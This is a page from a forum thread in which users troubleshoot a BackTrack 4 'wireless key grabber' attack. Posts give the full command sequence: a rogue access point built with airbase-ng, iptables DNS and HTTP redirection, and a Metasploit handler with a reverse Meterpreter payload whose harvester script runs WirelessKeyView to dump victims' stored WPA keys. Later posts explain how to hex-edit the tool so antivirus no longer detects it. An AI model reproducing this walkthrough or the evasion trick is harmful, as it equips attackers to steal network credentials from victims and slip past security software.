Page 3 of 5 FirstFirst 12345 LastLast
Results 21 to 30 of 44

Thread: Wireless key grabber - Backtrack 4

  1. #21
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    on the vista machine do an ipconfig and let me know what u get,


    i am thinking is there an ipv6 issue here? when doing the same thing on my n95 i monitor the at0 interface with wireshark, i see ipv6 requests and then the n95 phone times out saying no web gateway. just a theory.

    as for the wireless key, is this from an xp machine or vista?
    the wireless key seems really short for a wpa key hex, it should be 64 characters long like
    2cc55237638c88bb528a2d2a14b6e7cb59aa7564991fb082df ed05a689587f03


    can someone do the following

    create a fake ap using -e command, and then disassociate the client and see if it will connect to our fake ap acting as a legit ap, this is something we couldn't get working with backtrack 3, client would not associate, maybe it will work in bt4. If not I will try it as soon as i get delivery of my usb pen and run bt4 from it. vmware is just too slow to being these things

  2. #22
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I've posted a video performing your steps using BT3 and XP:
    http://blip.tv/file/1899796/

    You'll see at the end that the wireless key is not 64 bits.

    I'll post another with Vista so we can walk through the troubleshooting. Thanks for your help!

    William

  3. #23
    Junior Member
    Join Date
    Jan 2010
    Posts
    47

    Unhappy

    Quote Originally Posted by hm2075 View Post

    can someone do the following

    create a fake ap using -e command, and then disassociate the client and see if it will connect to our fake ap acting as a legit ap, this is something we couldn't get working with backtrack 3, client would not associate, maybe it will work in bt4. If not I will try it as soon as i get delivery of my usb pen and run bt4 from it. vmware is just too slow to being these things
    Yea i tried everything..There no way to make a client automatically connect to your fake AP unless the real Ap(not fake) has no encryption(or at least wep and you have the key,then it would have no reason to do the attack) and you have cloned the real Ap(same mac channel name(char sensitive)).So fake Ap==real Ap.I just tried it in BT4. Set my real AP in wpa tkip psk ,made my hp laptop autoconnect at it.Then on the other laptop dell with centrino 3945abg
    created the clone fake Ap(same mac same channel same name and with no encryption). Then just went to the extreme case.I powered off the real AP so that the hp would see only the Fake clone one(with no encryption) and here it come out that it never connected to the fake one.So there is a paradox.you can only grab keys at those pc who have no keys cause only those can connect to the Fake Ap.
    Otherwise connecting manually to a fake Ap everything works.Eset smart security update 28/03/2009 11'46 didn't detect anything.Thank to the hex edit probably.(i scanned the wkv.exe on some online virus checkers and only in one page 2 of them detected it as a 'virus' i think it was avast and mcafee).

    I used a non trasparent Ap
    And also used the apache2 service coming with Bt4
    first copy what's in the WKV folder in the /var/www/ folder



    1. start Meterpreter listener
    Code:
    cd /
    cd pentest
    cd exploits
    cd framework3
    ./msfconsole
    
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 5555
    set AutoRunScript /var/www/harvester.rb 
    set ExitOnSession false
    show options
    exploit -j
    2.Start the fake Ap
    Code:
    modprobe tun 
    airbase-ng   -e "XX" wlan0 -v
    on the test i made i tried every single option of airbaseThere is no way to connect to it(always talking about the encrypted test)


    3.configure the IP,s apache, and spoofdns to the apache
    Code:
    cp '/var/www/dhcpd.conf' '/etc/dhcp3/'
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush	
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    /etc/init.d/dhcp3-server restart
    
    service apache2 start
    
    cd /
    cd var/www/
    java ServerKernelMain 10.0.0.1 10.0.0.1
    I added once again the read lines cause it gave me problems with the dhcp3-server start.With those commands re-added it work.

    Once again this is a NON TRANSPARENT Fake Ap

    BIG THANK TO hm2075

  4. #24
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    I am aware that the -P command isn't working as it should,

    hence we can't dissasociate a victim and get them to connect, maybe someone should speak to the aircrack team about this.

  5. #25
    Junior Member
    Join Date
    Jan 2010
    Posts
    47

    Default

    Here is some more info.
    http://forum.aircrack-ng.org/index.php?topic=3247.0



    the -P -C 30 work quite well for non encrypted AP.Most clients are redirect to the fake one Independent from the name of the essid specified in the airbase command

    By the way new version of WirelessKeyView has been released 1.26 http://www.nirsoft.net/utils/wirelesskeyview.zip

  6. #26
    Junior Member
    Join Date
    Jan 2010
    Posts
    47

    Default

    Quote Originally Posted by williamc View Post
    Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the dhcp information from the attack box, but get "page cannot be displayed" when browsing. I cannot ping the attack box IP or Gateway, I get "Destination Unreachable".

    As for the wireless key in hex, this is what I gets dumped into the WKV folder:
    Code:
    cat FVPVC.txt
    Linksys             WPA-PSK             a78178f5a4050ce82de1              Dell Wireless 1350
    w {15CDB4A8-98B9-4285-
    Its not 64 bytes, and like I said, crashes Cain when I load it.

    William
    I found the error why it displays not full WPA-PSK hex key.
    In the harvester.rb script change the way wkv.exe is executed from
    Code:
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
    to
    Code:
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stab /#{out}", nil, {'Hidden' => 'false'})
    Now it displays the full hex key

    and here is the info about the difference bettwen vista and xp

    Code:
    Notice About WPA-PSK Keys
    When you type a WPA-PSK key in Windows XP, the characters that 
    
    you type are automatically converted into a new binary key that 
    
    contains 32 bytes (64 Hexadecimal digits). This binary key cannot 
    
    instantly be converted back to the original key that you typed, but you 
    
    can still use it for connecting the wireless network exactly like the 
    
    original key. In this case, WirelessKeyView displays this binary key in 
    
    the Hex key column, but it doesn't display the original key that you 
    typed.
    As opposed to Windows XP, Windows Vista doesn't convert the 
    
    WPA-PSK Key that you type into a new binary key, but it simply keep 
    
    the original key that you type. So under Windows Vista, the original 
    
    WPA-PSK key that you typed is displayed in the Ascii key column.

    Now is all in airbase-team hands.That's the missing part!!!
    Hope to get something soon!!!I know they can

  7. #27
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    nice one takedown32,

    glad there a people actually following the code and not blindly doing things

    for the airbase bit, we will just have to wait until the official 1.0 release, there a few things that need to be fixed as highlighted in the project map

    ps if you want wkv to be undetected you need to unpack it first, then open it up in hex editor, scroll somewhere towards the middle and find references to the author/company, change a few characters, that way you screw the signature up and most AV's will not detect it. For the remaining av's that do detect it you will have to hex edit elsewhere, in theory it is possible

  8. #28
    Junior Member
    Join Date
    Jan 2010
    Posts
    47

    Default

    Yea thanks for the trick.First version 1.26 was detected only by eSafe on virustotal http://www.virustotal.com/analisis/0...58ad016799f529

    After editing

    http://www.virustotal.com/analisis/5...4a31d85cc0f62d
    NONE.

  9. #29
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    what did u use to unpack?

    i think i used expander in windows, pe -edit??

    just need it for reference if other people want to do this

  10. #30
    Junior Member
    Join Date
    Jan 2010
    Posts
    47

    Default

    No, i always use Universal Extractor v.1.6.0.0 more info here http://www.legroom.net/software/uniextract
    Great AllInOne extractor!!!

Page 3 of 5 FirstFirst 12345 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •